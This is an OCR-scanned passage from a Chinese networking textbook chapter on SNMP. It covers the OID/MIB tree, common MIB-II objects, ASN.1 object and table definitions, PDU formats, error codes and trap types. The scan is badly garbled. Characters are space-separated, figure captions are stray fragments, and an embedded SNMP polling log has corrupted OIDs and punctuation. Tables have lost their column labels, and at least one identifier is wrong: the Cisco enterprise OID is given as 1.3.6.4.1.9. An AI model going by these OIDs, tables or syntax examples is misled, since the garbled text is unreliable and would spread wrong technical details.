一 个 实例 的 情况 ， 例 如 代表 设备 系统 描述 的 1.3.6.1.2.1.1.1 就 是 一 个 简单 变量 ， 而 表 变量 
一 般 是 指 该 变量 对 应 着 多 个 实例 ， 例 如 针对 交换 机 的 接口 带宽 ， 假 设 这 个 变量 的 OID 为 
1.3.6.1.2.1.2.2.1.5， 而 通常 一 个 交换 机 会 有 多 个 接口 ， 此 时 为 了 获取 对 某 个 接口 的 接口 带 
宽 ， 我 们 可 以 在 每 个 具体 的 请 求 时 加 上 对 接口 的 索引 ， 例 如 1.3.6.1.2.1.2.2.1.5.2， 其 中 最 
后 面 的 .2 就 代表 了 2 号 接口 的 带宽 。 图 10-5 列 出 了 一 台 交 换 机 的 某 接口 MIB 信息 。 

所 有 对 象 标识 符 OID 的 实体 将 会 组 成 一 个 OID 树 状 结构 ， 其 结构 类 似 于 Internet 的 
域名 系统 ， 每 个 实体 就 是 树 中 的 一 个 节点 ， 其 中 最 上 面 的 节点 被 称 为 根 节点 ， 边 缘 节 点 称 
为 叶子 节点 ， 每 个 节点 有 一 个 名 字 和 一 个 非 负 整数 构成 ， 这 个 非 负 整 数 表 示 该 节点 本 身 在 
同 级 节点 中 所 处 的 位 置 ， 图 10-6 为 一 个 OID 树 的 部 分 结构 示意 图 。 
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11:22:53 Done 21758496 Status=0 

11;22:53 0 ASN_COUNTER, ASN_TIMETICKS: 266688866 

11:22:53 1 ASN_INTEGER, ASN_GAUGE: 6 

11:22:53 2 ASN_INTEGER, ASN_GAUGE: 1 

11:22:53 3 ASN_INTEGER, ASN_GAUGE: 100000000 

11:22:53 4 ASN_INTEGER, ASN_GAUGE: 100 

11:22:53 5 ASN_COUNTER64: 266688866 

11:22:53 Testing... 

11;22;53 64bit: 0,266688866 

11:22:53 Ok 

11:22;53 GET; 1,3.6,1.2.1.31.1,1.1.18.3 

11:22:53 Try 1 

11:22:53 Start 21758496 

11:22:53 Done 21758496 Status=0 

11:22:53 0 ASN_OCTET_STR: 

11:22:53 FAlias; 

11:22:53 GET NEXT: 1.3.6.1.2.1.31.1.1.1.1.3 

11:22:53 Start 21758496 

11:22:53 Done 21758496 Status=0 

11:22:53 0 ASN_OCTET_STR: Fa0j4 

11:22:53 GetNext=1.3.5.1.2.1.31.1.1.1.1.4 

11;22;53 Current; 1,3,6,1,2,1,31,1,1,1,1,4 
Description: Fa0l4 


11:22:53 
11:22:53 GET List: 1: 
11:22:53 Try 1 
11;22;53 Start 21758496 

11:22;53 Done 21758496 Status=0 

11:22:53 0 ASN_COUNTER, ASN_TIMETICKS: 0 
11:22:53 1 ASN_INTEGER, ASN_GAUGE: 6 
11:22:53 2 ASN_INTEGER, ASN_GAUGE: 2 
11:22:53 3 ASN_INTEGER, ASN_GAUGE; 10000000 
11:22:53 4 ASN_INTEGER, ASN_GAUGE: 10 
11:22:53 5 ASN_COUNTER64: 0 

11:22:53 Testing,,. 
11:22:53 64bit: 0,0 
11:22:53 Ok 
11:22:53 GET: 1.3.6， 
11:22:53 Try 1 
11:22:53 Start 21758496 
11:22:53 Done 21758496 Status=0 
11:22:53 0 ASN_OCTET_STR: 
11:22:53 fAlias: 
11:22:53 GET NEXT: 1.3.6.1.2.1.31.1.1.1.1.4 
11:22:53 Start 21758496 

11:22:53 Done 21758496 Status=0 
11:22:53 0 ASN_OCTET_STR: F: 

11:22:53 GetNext=1,3,6,1,2,1,31,1,1,1,1,5 


4 
6.1.2.1.2.2.1.10,4,1,3.6.1.2.1,2.2.1.3.4,1.3.6,1.2,.1,2.2.1.8.4,1.3,.6.1.2,.1.2,.2.1， 


2.1.31,1.1.1.18.4 


11:22:53 Current; 1.3.6.1.2.1.31.1.1.1.1.5 
11:22:53 Description; Fa0/S 
11:22:53 GET List: 1.: 2.1.10.5,1.3.6.1.2.1.2.2.1.3.5,1.3.6.1,2.1.2.2.1.8,5,1.3.6.1.2.1.2.2.1, 


11;22;53 Try 1 
11;22;53 Start 21758496 


10-5 ”交换 机 端口 MIB 库 信 息 


en En 


和 


registration anthority(1) meniber body(2) 


图 10-6 OID 树 的 部 分 结构 示意 图 
在 整个 OID 树 中 ， 只 有 叶子 节点 才 真 正 表示 一 个 信息 实体 ， 其 他 的 节点 被 称 为 辅助 
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节点 ， 可 见 辅助 节点 构成 了 OID 树 的 枝 干 。 例 如 对 于 一 个 用 于 系统 描述 (sysDescr) 的 OID 
为 1.3.6.1.2.1.1.1， 它 其 实 由 三 部 分 组 成 : 
e@ 第 一 部 分 是 1.3.6.1.2.1， 由 图 10-6 可 以 看 出 ， 它 表示 了 iso-org-dod-internet- 
mgmt-mib-II。 
e@ 第 二 部 分 是 其 后 面 的 system(1)， 它 的 取 值 在 RFC1213 中 有 详细 的 定义 ， 例 如 : 


system OBJECT IDENTIFIER ::= { mib-2 1 } 
interfaces OBJECT IDENTIFIER ::= { mib-2 2 } 
at OBJECT IDENTIFIER ::= { mib-2 3 } 
ip OBJECT IDENTIFIER ::= { mib-2 4 } 
icmp OBJECT IDENTIFIER ::= { mib-2 5 } 
tcp OBJECT IDENTIFIER ::= { mib-2 6 } 
udp OBJECT IDENTIFIER ::= { mib-2 7 } 
egp OBJECT IDENTIFIER ::= { mib-2 8 } 
-- historical (some say hysterical) 

-—- cmot OBJECT IDENTIFIER ::= { mib-2 9 } 
transmission OBJECT IDENTIFIER ::= { mib-2 10 } 
snmp OBJECT IDENTIFIER ::= { mib-2 11 } 


由 于 sysDescr 是 属于 System 组 的 ， 因 此 值 为 1。 

e@ 第 三 部 分 是 最 后 一 个 序列 的 值 ， 同 理 它 的 值 也 为 1。 

将 这 三 个 部 分 合并 起 来 就 形成 了 一 个 描述 sysDescr 的 OID(1.3.6.1.2.1.1.1)。 

2) ”MIB 库 的 结构 

IETF 规定 的 管理 信息 库 MIB 也 是 一 个 树 形 结构 ， 用 于 存放 定义 了 可 访问 的 网 络 设备 
及 其 属性 ，SNMP 协议 消息 通过 遍历 MIB 属性 目录 中 的 节点 来 访问 网 络 中 的 设备 。MIB 
为 网 络 管理 提供 了 一 个 描述 网 络 中 所 有 可 能 被 管理 对 象 的 集合 的 数据 结构 ， 在 MIB 库 
中 ， 每 个 网 络 设 备 及 其 属性 都 由 一 个 对 象 标识 符 OID 唯一 指定 。 实 际 上 ，MIB 库 就 是 
OID 的 树 形 集合 ， 它 定义 了 每 个 OID 代表 的 具体 含义 。MIB 分 为 公有 MIB 和 私有 MIB， 
公有 MIB-2 定义 于 1991 年 ， 所 有 设备 和 厂商 一 般 都 支持 该 MIB 库 中 定义 的 OID 变量 。 
同时 每 个 厂商 还 可 以 扩充 自己 的 MIB 库 ， 这 就 是 私有 MIB， 例 如 思科 公司 的 私有 MIB 是 
以 1.3.6.4.1.9 序列 开始 的 ， 该 节点 下 的 所 有 子 变 量 都 是 归 思 科 公 司 所 有 。 

通常 ， 一 个 SNMP 应 用 实体 可 操作 的 对 象 子 集 称 为 SNMP MIB 的 授权 范围 ，SNMP 
应 用 实体 可 对 授权 范围 内 管理 对 象 的 访问 设置 一 定 的 访问 控制 限制 ， 例 如 只 读 、 读 写 等 。 
在 共同 体 的 定义 中 ， 一 般 要 规定 该 共同 体 授权 的 SNMP 管理 对 象 的 范围 ， 相 应 地 也 就 规 
定 了 哪些 SNMP 对 象 实例 是 该 共同 体 的 “管辖 范围 ”， 因 此 共同 体 的 定义 也 可 以 看 作 是 
一 个 以 词典 序 提供 了 遍历 所 有 SNMP 管理 对 象 实例 的 多 又 树 。 

另外 ，SNMP MIB 的 定义 与 具体 的 网 络 管理 协议 无 关 ， 这 表示 任何 厂商 都 可 以 在 自己 
的 产品 中 包含 SNMP 代理 软件 ， 并 保证 在 定义 新 的 MIB 后 ， 该 软件 仍然 遵循 相应 标准 ; 
对 用 户 而 言 ， 用 户 可 以 使 用 同一 网 络 管理 客户 软件 来 管理 具有 不 同 版 本 的 MIB 多 种 
设备 。 

3) “一 些 常 用 的 MIB 节点 

在 基于 TCP/IP 的 因特网 网 络 管理 信息 库 RFC1213.mib 中 ， 存 在 着 很 多 的 管理 对 象 ， 
我 们 在 这 里 列举 一 些 常用 的 节点 信息 ， 供 初学 者 对 MIB 库 的 使 用 有 一 个 直观 的 认识 和 
了 解 。 
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(1) mgmt/mib-2/system/sysDescr.0(OID 为 1.3.6.1.2.1.1.1.0) 

此 对 象 为 只 读 的 显示 串 ， 它 通常 包含 所 用 硬件 、 操 作 系统 和 网 络 软件 的 名 称 和 版 本 等 
完整 信息 。 

(2) mgmt/mib-2/system/sysContact.0(OID 为 1.3.6.1.2.1.1.4.0) 

此 对 象 为 可 读 写 的 显示 串 ， 它 一 般 提 供 该 节点 负责 人 的 姓名 和 地 址 ， 有 时 也 可 用 它 来 
测试 代理 (Agenb 是 否 可 写 。 

(3) mgmt/mib-2/system/sysUpTime.0(OID 为 1.3.6.1.2.1.1.3.0) 

此 对 象 为 只 读 的 TimeTicks 类 型 ， 它 定义 了 自 最 近 一 次 重新 初始 化 后 ， 网 络 管理 软件 
所 经 过 的 时 间 ( 以 1/100 秘 为 单位 )。 通 常 代理 (Agenb 在 启动 时 便 初 始 化 时 钟 ， 有 时 可 比较 
sysUpTime 的 值 来 决定 被 管 设备 的 稳定 性 。 

(4) mgmt/mib-2/ip/ipInReceives.0(OID 为 1.3.6.1.2.1.4.3.0) 

此 对 象 为 只 读 的 计数 器 (Counter)， 它 累计 从 接口 收 到 的 人 P 输入 数据 报 的 总 数 ， 包 括 
出 错 的 数据 报 。 数 据 报 包括 TCP 和 UDP 层 ， 此 对 象 可 以 用 来 检测 设备 的 忙碌 程度 。 

(5) mgmt/mib-2/ip/ipOutRequests.0(OID 为 1.3.6.1.2.1.4.10.0) 

此 对 象 为 只 读 计数 器 ， 它 累计 IP 的 上 层 协 议 ( 如 TCP、UDP 或 ICMP) 提 供给 IP 传送 
的 全 部 数据 报 个 数 。 

(6) mgmt/mib-2/ip/ipOutDiscards.0(OID 为 1.3.6.1.2.1.4.11.0) 

此 对 象 为 只 读 计数 器 ， 它 累计 在 把 报 文 传送 到 最 后 目的 地 时 没有 出 错 ， 但 被 丢弃 ( 通 
常 是 由 于 缓冲 区 的 空间 有 限 ) 的 输出 IP 数据 报 数 。 如 果 此 对 象 值 不 为 0， 则 表明 设备 接口 
卡 或 网 线 有 问题 。 

(7) mgmt/mib-2/ip/ipForwDatagrams.0(OID 为 1.3.6.1.2.1.4.6.0) 

此 对 象 为 只 读 计数 器 ， 它 累计 不 以 本 实体 为 目标 机 的 数据 报 个 数 。 当 被 管 设备 是 网 
关 、 网 桥 、 路 由 器 时 此 对 象 特别 有 用 ， 它 显示 被 管 设 备 (如 路 由 器 ) 的 忙碌 程度 ， 如 果 发 送 
一 个 通过 路 由 器 的 数据 报 后 ， 此 对 象 的 值 为 0， 则 此 路 由 器 可 能 有 问题 。 

(8) mgmt/mib-2/tcp/tcpCurrEstab.0(OID 为 1.3.6.1.2.1.6.9.0) 

此 对 象 为 只 读 的 量规 计数 器 ， 它 显示 被 管 设 备 的 当前 状态 是 ESTABLISHED 或 
CLOSE WAIT 状态 的 TCP 连接 数 。 一 个 TCP 会 话 可 以 是 HITP 连接 、FTP 连接 、Telnet 
连接 、Mail 连接 或 其 他 使 用 TCP/IP 协议 的 连接 ， 当 想 知 道 被 管 设 备 是 如 何 工作 的 ， 利 用 
该 对 象 是 最 合适 不 过 了 。 

另外 ， 在 标准 的 SNMP MIB 中 ， 接 口 表 非常 重要 ， 它 通常 包含 了 一 个 设备 接口 的 公 
共 信 息 ， 当 被 管理 设备 是 路 由 器 、 网 桥 或 网 关 等 时 ， 此 表 尤 为 重要 ， 因 为 用 户 可 以 通过 该 
表 确 认 某 个 接口 的 状态 ， 例 如 “ifDescr.3” 为 被 管 设备 的 第 3 个 接口 描述 。 在 MIB 接口 表 
中 常见 的 一 些 OID 为 : 

1) /mgmt/mib-2/interfaces/ifTable/ifEntry/ifDescr.N 

它 描述 了 第 N 个 接口 的 厂商 名 、 产 品名 和 硬件 接口 的 版 本 号 。 

2) /mgmt/mib-2/interfaces/ifTable/ifEntry/ifOperStatus.N 

该 项 值 为 Up(1)、Downd(2)、Testing(3) 的 只 读 枚 举 型 ， 它 描述 了 第 N 个 接口 的 描述 条 
件 或 接口 状态 。 在 网 管 的 失效 管理 中 ， 此 对 象 可 以 和 接口 表 中 唯一 的 可 写 对 象 
ifAdminStatus. N 结合 在 一 起 ， 确 定 接口 的 当前 状态 。 两 个 对 象 都 返回 整数 1、2、3， 其 组 
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合 结 果 的 意义 如 下 所 示 : 

(1) Up(1) &Up(1) 一 一 正常 运行 。 

(2) Down(2) &Up(1) 一 一 失败 。 

(3) Down(2) &Down(2) 一 一 Down( 关 闭 )。 

(4) Testing(3) &Testing(3) 一 一 Testing( 测 试 )。 

3) /mgmt/mib-2/interfaces/ifTable/ifEntry/ifSpeed.N 

此 对 象 类 型 定义 为 第 N 个 接口 当前 带宽 的 估算 值 ( 按 位 / 秒 计算 )。 

4) /mgmt/mib-2/interfaces/ifTable/ifEntry/ifInOctets.N 

此 对 象 类 型 为 只 读 计数 器 (Counter)， 它 定义 了 第 N 个 接口 上 收 到 的 字 节 总 数 (包括 帧 
格式 )。 

5) /mgmt/mib-2/interfaces/ifTable/ifEntry/ifOutOctets.N 

此 对 象 类 型 为 只 读 计数 器 (Counter)， 它 定义 了 在 第 N 个 接口 上 输出 的 字 节 总 数 (包括 
帧 格式 )。 

6) /mgmt/mib-2/interfaces/ifTable/ifEntry/ifInErrors.N 

此 对 象 类 型 为 只 读 计数 器 (Counter)， 它 显示 在 第 N 个 接口 上 入 站 的 错误 报 文 数 ， 防 止 
把 它们 转发 到 高 层 协议 。 

7) /mgmt/mib-2/interfaces/ifTable/ifEntry/ifOutErrors.N 

此 对 象 类 型 为 只 读 计数 器 (Counter)， 它 显示 在 第 N 个 接口 上 由 于 出 错 而 没有 发 出 的 输 
出 方向 报 文 总 数 。 

掌握 MIB 常用 节点 的 描述 和 意义 ， 有 助 于 我 们 在 开发 SNMP 应 用 或 使 用 网 络 管理 系 
统 时 对 网 络 对 象 描述 的 正确 掌握 。 


4. MIB 库 与 ASN.1 语法 


网 络 管理 中 MIB 文件 是 用 ASN.1 语法 来 描述 的 ，ASN.1 是 抽象 句法 表示 法 的 简称 ， 
每 个 MIB 都 使 用 定义 在 ASN.1 中 的 树 型 结构 组 织 所 有 可 用 的 信息 ， 其 中 的 每 片 信息 都 对 
应 一 个 有 标号 的 节点 ， 每 个 节点 又 包含 了 两 方面 的 内 容 : 一 个 是 对 象 标识 符 ， 另 一 个 是 一 
段 简短 的 文本 描述 ， 对 象 标识 符 OID 指定 了 节点 在 ASN.1 树 中 的 准确 位 置 ， 而 文本 描述 
是 对 带 标号 的 节点 的 描述 ， 一 个 带 标号 的 节点 可 以 拥有 包含 其 他 带 标号 节点 的 子 树 ， 如 果 
没有 这 样 的 子 树 ， 该 节点 就 是 一 个 叶子 节点 。 

1]) “对 象 标识 符 类 型 

在 ASN.1 语法 中 ， 对 象 标识 符 类 型 用 于 对 象 的 抽象 描述 ， 前 面 已 经 提 到 ，MIB 树 中 
的 每 一 个 标号 都 是 用 OID 来 描述 的 。 在 ASN.1 中 ， 它 可 用 OBJECT IDENTIFIER 来 声 
明 ， 例 如 : 


myBranch OBJECT IDENTIFIER ::= {parentBranch 1} 


其 中 myBranch 是 一 个 分 支 子 树 ， 它 定义 在 parentBranch 树枝 下 ，“1” 是 子 树 
myBranch 在 parentBranch 下 的 一 个 唯一 OID 符 ， 表 示 parentBranch 下 多 个 分 支 中 的 
一 才 。 

2) ”标量 对 象 标识 符 

标量 对 象 标 识 符 ， 也 称 叶子 对 象 标识 符 。 在 一 个 树枝 下 ， 通 常 可 能 包含 多 个 子 树 ， 同 
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时 也 可 以 定义 被 管理 的 对 象 ， 即 叶子 节点 。 其 定义 语法 如 下 : 


(objectname) OBJECT-TYPE 
SYNTAX (syntax) 
ACCESS (access) 
STATUS (status) 
DESCRIPTION (description) 


3) 


::= { (parent) (number) } 


对 该 


语法 的 解释 如 下 : 

(objectname): 被 管理 对 象 的 名 字 ，ASN.1 语法 要 求 所 有 对 象 的 名 字 必 须 以 小 写 
字母 开头 ， 同 时 要 求 该 名 字 在 MIB 库 中 要 有 唯一 性 。 

OBJECT-TYPE: 每 个 叶子 节点 所 必须 具有 的 关键 字 。 

SYNTAX: 被 管 对 象 类 型 的 关键 字 ， 说 明 随后 跟着 的 是 一 个 类 型 。 

(syntax): 被 管 对 象 的 类 型 ，ASN.1 句法 要 求 所 有 的 对 象 类 型 必须 以 大 写字 母 开 
头 ， 其 中 已 预定 义 了 的 类 型 有 Counter、Gauge、DisplayString、INTEGER 等 。 
ACCESS: 被 管 对 象 的 访问 方式 的 关键 字 ， 在 SNMP 第 二 版 中 为 MAX-ACCESS 
关键 字 。 

(access): 提供 被 管 对 象 的 访问 方式 ， 有 以 下 几 种 可 选 值 ，read-only、read-write 
和 no-accessible， 另 外 在 SNMP 第 2 版 中 又 新 增 了 一 种 read-create 方式 。 
STATUS: 被 管 对 象 的 状态 的 关键 字 。 

(status): 可 选 值 有 mandatory 、optional、obsolete、deprecate(SNMP 第 1 版 中 )， 
current、obsolete、deprecate(SNMP 第 2 版 )。 

DESCRIPTION: 对 被 管 对 象 的 功能 、 特 征 等 进行 描述 的 关键 字 。 

(description): 被 管 对 象 的 文本 描述 ， 须 用 双 引 号 表示 文本 的 开始 与 结束 ， 如 果 
没有 文本 说 明 ， 可 只 保留 一 个 空 的 双 引 号 。 

(parent): 包含 此 叶子 对 象 的 树枝 ， 即 叶子 对 象 的 父亲 必须 是 用 “OBJECT 
IDENTIFIER” 声 明 的 对 象 标 示 符 类 型 。 

(number): 指定 该 节点 是 在 父 树枝 下 的 第 几 个 叶子 对 象 ， 一 般 number 的 取 值 都 
是 从 1 开始 的 。 

表 类 型 


SNMP 表 是 一 种 特殊 类 型 的 声明 ， 表 内 声明 的 对 象 称 为 列 对 象 ， 其 语法 格式 如 下 : 


(tablename) OBJECT-TYPE 
SYNTAX SEQUENCE OF (tabletype) 
ACCESS not-accessible 
STATUS mandatory 
DESCRIPTION (description) 


{ (parent) (number) } 


(entryname) OBJECT-TYPE 
SYNTAX (tabletype) 

ACCESS not-accessible 

STATUS mandatory 
DESCRIPTION (description) 


{ (tablename) 1 } 


(tabletype) ::= SEQUENCE { 


(columnl1) (columnltype), 


第 10 章 ”网络 管理 原理 357 


(column2) (column2type), 
(columnN) (columnNtype) } 
ASN.1 语法 中 对 定义 一 个 表 必 须 符合 一 定 的 规则 ， 如 : 
@ 在 表 (tablename) 的 命名 中 ， 必 须要 有 一 个 “Table” 关 键 字 ， 例 如 “myTable”; 
e@ ”同样 ， 在 表 对 象 下 面 的 表 目 (entryname) 中 也 须 提供 一 个 “Entry” 关 键 字 ， 例 如 
“myEntry” 。 
@ “(column1) 是 表 的 列 对 象 ，(columnltype) 则 是 此 列 对 象 的 类 型 。 
另外 ， 由 于 表 和 行 对 象 没 有 叶子 节点 ， 因 此 不 能 被 SNMP 访问 ， 因 此 上 面 的 
(tablename) 和 (entryname) 中 的 ACCESS 项 为 not-accessible。 
下 面 是 一 个 表 类 型 的 实例 ， 该 表 有 三 个 列 对 象 myIndex、myColumn1、myColumn2: 
myTable OBJECT-TYPE 
SYNTAX SEQUENCE OF MyEntry 
ACCESS not-accessible 
STATUS mandatory 
DESCRIPTION “这 是 一 个 表 名 为 myTable 的 表 对 象 ” 
::={ myParent 1 } 
myEntry OBJECT-TYPE 
SYNTAX MyEntry 
ACCESS not-accessible 
STATUS mandatory 
DESCRIPTION 
“该 表 的 表 目 ， 其 中 INDEX 关键 字 必 须 存 在 ， 它 的 索引 值 为 列 对 象 中 的 第 一 个 对 象 “ 
INDEX {myIndex } 
::={ myTable 1 } 
MyEntry: := 
SEQUENCE { 
myIndex INTEGER, 
myColumnl1 INTEGER, 
myColumn2 OCTET STRING， // 表 中 定义 的 三 个 列 对 象 
} 
有 关 ASN.1 的 语法 ， 读 者 可 以 进一步 查阅 RFC1155、RFC1212 等 文档 ,一般 MIB 文 


件 的 后 级 名 都 用 “.mib” 来 表示 。 


10.3.3 SNMP 协议 基本 原理 


SNMP 作为 一 种 应 用 协议 ， 它 为 SNMP 管理 者 和 代理 者 之 间 的 通信 定义 了 协议 消息 
格式 ，SNMP 管理 者 一 般 是 网 络 管理 系统 的 一 部 分 ， 而 SNMP 代理 和 管理 信息 库 MIB 一 
般 包 含 在 网 络 设 备 和 主机 上 ， 通 过 配置 SNMP 的 参数 ， 可 以 建立 起 管理 者 和 代理 之 间 的 

1. SNMP 的 基本 通信 模型 

SNMP 代理 包含 了 一 些 用 于 描述 网 络 运行 状态 的 管理 变量 ， 管 理 者 可 以 通过 SNMP 
代理 获取 或 者 更 改 这 些 变量 。SNMP 代理 可 以 从 包含 设备 参数 和 网 络 状态 数据 的 MIB 库 


中 收集 各 类 管理 信息 ， 同 时 也 能 够 响应 管理 者 发 出 的 设置 或 请 求 操作 。SNMP 代理 还 能 主 
动向 管理 者 发 送 Trap 信息 ， 以 通告 网 络 中 某 个 事件 的 发 生 ， 例 如 认证 失败 、 重 启动 、 连 
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接 状 态 和 拓扑 改变 等 重要 事件 。 

在 具体 的 通信 过 程 中 ， 通 常 由 网 管 站 (NMS) 向 网 络 设备 发 送 各 种 查询 报 文 ， 并 接收 来 
自 被 管 设备 的 响应 及 陷阱 (Trap) 报 文 ， 并 将 结果 显示 出 来 。 代 理 (Agent) 则 是 驻 留 在 被 管 设 
备 上 的 一 个 进程 ， 它 负责 接收 、 处 理 来 自 网 管 站 的 请 求 报 文 ， 然 后 从 设备 上 其 他 协议 模块 
中 取得 管理 变量 的 数值 ， 并 形成 响应 报 文 ， 反 馈 给 NMS。 在 一 些 紧急 情况 下 ， 如 接口 状 
态 发 生 改变 、 呼 叫 成 功 等 的 时 候 ， 代 理 可 以 通过 发 送 陷阱 TRAP 报 文 主动 通知 NMS， 其 
基本 的 通信 模式 如 图 10-7 所 示 。 


10-7 SNMP 协议 基本 通信 模式 
SNMP 代理 和 NMS 通过 SNMP 协议 中 的 标准 消息 来 进行 通信 ， 每 个 消息 都 是 一 个 单 
独 的 数据 报 ， 并 且 使 用 UDP( 用 户 数据 报 ) 协 议 作为 第 四 层 传输 协议 进行 无 连接 的 操作 。 
SNMP 消息 报 文 包含 两 个 部 分 : SNMP 报头 和 协议 数据 单元 PDU。 
一 个 SNMP 数据 报 结构 一 般 由 以 下 三 个 部 分 组 成 。 
@ 版 本 识别 符 (Version Identifier): 确保 SNMP 代理 使 用 相同 的 协议 ， 每 个 SNMP 
代理 都 直接 抛弃 与 自己 协议 版 本 不 同 的 数据 报 。 
@ 团体 名 (Community Name): 用 于 SNMP 的 认证 ， 如果 网 络 配置 成 要 求 验 证 时 ， 
SNMP 从 代理 将 对 团体 名 和 管理 站 的 IP 地 址 进行 认证 ， 如 果 失 败 ，SNMP 从 代 
理 将 向 管理 站 发 送 一 个 认证 失败 的 Trap 消息 
@ 协议 数据 单元 PDU): 其 中 PDU 指明 了 SNMP 的 消息 类 型 及 其 相关 参数 。 
SNMP 就 是 用 来 规定 NMS 和 Agent 之 间 是 如 何 传递 管理 信息 的 应 用 层 协 议 。 


2. SNMP 的 基本 操作 类 型 和 报 文 格式 


为 了 让 用 户 可 以 采用 管理 信息 库 标 准 或 按 标 准 的 方式 来 定义 自己 的 管理 信息 库 
(MIB)，SNMP 协议 以 GET-SET 方式 替代 了 复杂 的 命令 集 ， 利 用 五 种 基本 操作 类 型 来 演绎 
相关 的 全 部 操作 ， 大 大 降低 了 整个 协议 实现 的 成 本 。 表 10-3 列 出 了 SNMP 协议 的 五 种 基 
本 操作 类 型 。 
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表 10-3 SNMP 协议 的 基本 操作 类 型 
操作 命令 


get-request 


操作 含义 
从 代理 进程 处 提取 一 个 或 多 个 变量 值 
从 代理 进程 处 提取 表格 中 紧 跟 当前 值 的 下 一 项 值 
把 一 数值 存 入 具体 变量 
返回 一 个 或 多 个 变量 值 ， 它 由 代理 进程 发 出 ， 是 对 前 面 三 种 操作 的 响应 操作 
代理 进程 主动 发 出 的 通知 报 文 ， 通 知 管理 进程 有 某 些 事件 发 生 


同时 这 5 种 基本 操作 类 型 对 应 着 SNMP 报 文中 5 种 协议 数据 单元 PDU 的 类 型 。 其 
中 ， 前 三 种 操作 是 由 管理 进程 向 代理 进程 发 出 的 ， 后 面 的 两 种 操作 是 代理 进程 发 给 管理 进 
程 的 ，SNMP 协议 在 代理 进程 端 使 用 UDP 161 端口 来 接收 get 或 set 报 文 ， 而 在 管理 进程 
端 使 用 UDP 162 端口 来 接收 trap 报 文 。 它 们 之 间 的 关系 如 图 10-8 所 示 。 


get-next-request 


set-request 


et-response 


fral 


SNMIP 管理 程序 SNMP 代理 程序 

get-request 
get-response WDP 端口 161 

A UDP 端口 161 
get-response 

set-request WDP 端口 161 
get-respornse 

UDP 端口 162 =P 


10-8 SNMP 报 文 操作 类 型 示意 图 


图 10-9 给 出 了 SNMP 报 文 封装 的 过 程 ， 其 中 SNMP 报 文 共有 三 个 部 分 组 成 ， 即 公共 
SNMP 首部 、get/set 首部 (trap 首部 ) 和 变量 绑 定 。 


卓 一 一 


图 10-9 SNMP 报 文 封装 格式 示意 图 
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1) 公共 SNMP 首部 

这 部 分 报 文 共 涉及 以 下 三 个 字段 。 

(1) 版 本 

标识 SNMP 消息 使 用 的 版 本 号 ，0 一 一 SNMPv1,， 1 一 一 SNMPv2,， 2 一 一 SNMPv3。 

(2) 共同 体 

共同 体 是 一 个 字符 串 ， 作 为 管理 进程 和 代理 进程 之 间 的 明文 口令 ,默认 情况 下 通常 采 
用 6 个 字符 的 “public”， 在 实际 应 用 时 ， 为 了 安全 考虑 必须 废弃 “public” 而 改 用 其 他 
口令 。 

(3) PDU 类 型 

该 字段 标明 了 SNMP 使 用 的 操作 类 型 ， 它 的 取 值 为 :0 一 一 get-request，1 一 一 get-next- 
request, 2 get-response, 3——set-request, 4——trap。 

2) ”get/set 首部 (trap 首部 ) 

get/set 首部 通常 包含 请 求 标识 符 、 差 错 状态 和 差错 索引 ， 其 含义 和 取 值 如 下 。 

(1) 请 求 标识 符 (Request ID) 

这 是 由 管理 进程 设置 的 一 个 整数 值 。 代 理 进程 在 发 送 get-response 报 文 时 也 要 返回 此 
请 求 标识 符 。 管 理 进程 可 同时 向 许多 代理 发 出 get 报 文 ， 这 些 报 文 都 使 用 UDP 传送 ， 先 
发 送 的 有 可 能 后 到 达 。 设 置 了 请 求 标识 符 可 使 管理 进程 能 够 识别 返回 的 响应 报 文 对 于 哪 一 
个 请 求 报 文 。 

(2) 差错 状态 (Error Status) 

由 代理 进程 返回 时 填 入 0 一 5 中 的 一 个 数字 ， 表 10-4 列 出 了 对 差错 状态 值 的 描述 。 


表 10-4 SNMP 协议 差错 状态 描述 


差错 状态 状态 说 明 
一 切 正 党 
代理 无 法 将 回答 装 入 到 一 个 SNMP 报 文 之 中 
操作 指明 了 一 个 不 存在 的 变量 


0 
1 
和 2 
3 一 个 set 操作 指明 了 一 个 无 效 值 或 无 效 语法 
4 管理 进程 试图 修改 一 个 只 读 变量 
5 genErr 某 些 其 他 的 差错 
(3) 差错 索引 (Error Index) 
当 出 现 noSuchName、badValue 或 readOnly 的 差错 时 ， 由 代理 进程 在 回答 时 设置 的 一 
个 整数 ， 它 指明 有 差错 的 变量 在 变量 列表 中 的 偏 移 。 
此 外 ，trap 首部 中 的 trap 类 型 共有 7 种 ， 如 表 10-5 所 示 。 当 trap 类 型 为 2、3、5 


时 ， 在 报 文 后 面 变 量 部 分 的 第 一 个 变量 应 标识 响应 的 接口 。 当 trap 类 型 为 6 时 ， 特 定 代码 
(specific-code) 字 段 指明 了 代理 自 定义 的 时 间 ， 和 否则 为 0。 
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表 10-5 7 种 trap 报 文 类 型 


trap 类 型 名 字 说 明 
0 coldStart 代理 进行 了 初始 化 
1 warmStart 代理 进行 了 重新 初始 化 
2 linkDown 一 个 接口 从 工作 状态 变 为 故障 状态 
3 linkU 一 个 接口 从 故障 状态 变 为 工作 状态 
4 authenticationFailure 从 SNMP 管理 进程 接收 到 具有 一 个 无 效 共同 体 的 报 文 
5 egpNeighborLoss 一 个 EGP 相 邻 路 由 器 变 为 故障 状态 
6 enterpriseSpecific 代理 自 定义 的 事件 ， 需 要 用 后 面 的 “特定 代码 ”来 指明 
3) ”变量 绑 定 


在 这 部 分 中 将 指明 一 个 或 多 个 变量 的 名 和 对 应 的 值 。 在 get 或 get-next 报 文中 ， 变 量 
的 值 应 忽略 。 


3. SNMP 应 用 协议 的 运行 过 程 


驻 留 在 被 管 设备 上 的 代理 进程 会 从 UDP 161 端口 接收 来 自 NMS 的 串 行 化 报 文 ， 经 解 
码 、 团 体 名 验证 、 分 析 ， 得 到 管理 变量 在 MIB 树 中 对 应 的 节点 ， 并 从 相应 的 模块 中 得 到 
管理 变量 的 值 ， 然 后 形成 响应 报 文 ， 通 过 编码 发 送 回 NMS。NMS 得 到 响应 报 文 后 ， 再 经 
同样 的 处 理 ， 最 终 显示 结果 。 下 面 根 据 RFC1157 详细 介绍 代理 (Agenb 接 收 到 报 文 后 采取 
的 动作 。 

第 一 步 : 首先 Agent 解码 生成 用 内 部 数据 结构 表示 的 报 文 ， 解 码 依据 ASN.1 的 基本 
编码 规则 ， 如 果 在 此 过 程 中 出 现 错 误导 致 解码 失败 则 丢弃 该 报 文 ， 不 做 进一步 处 理 。 

第 二 步 : 将 报 文中 的 版 本 号 取出 ， 如 果 与 本 Agent 支持 的 SNMP 版 本 不 一 致 ， 则 丢 
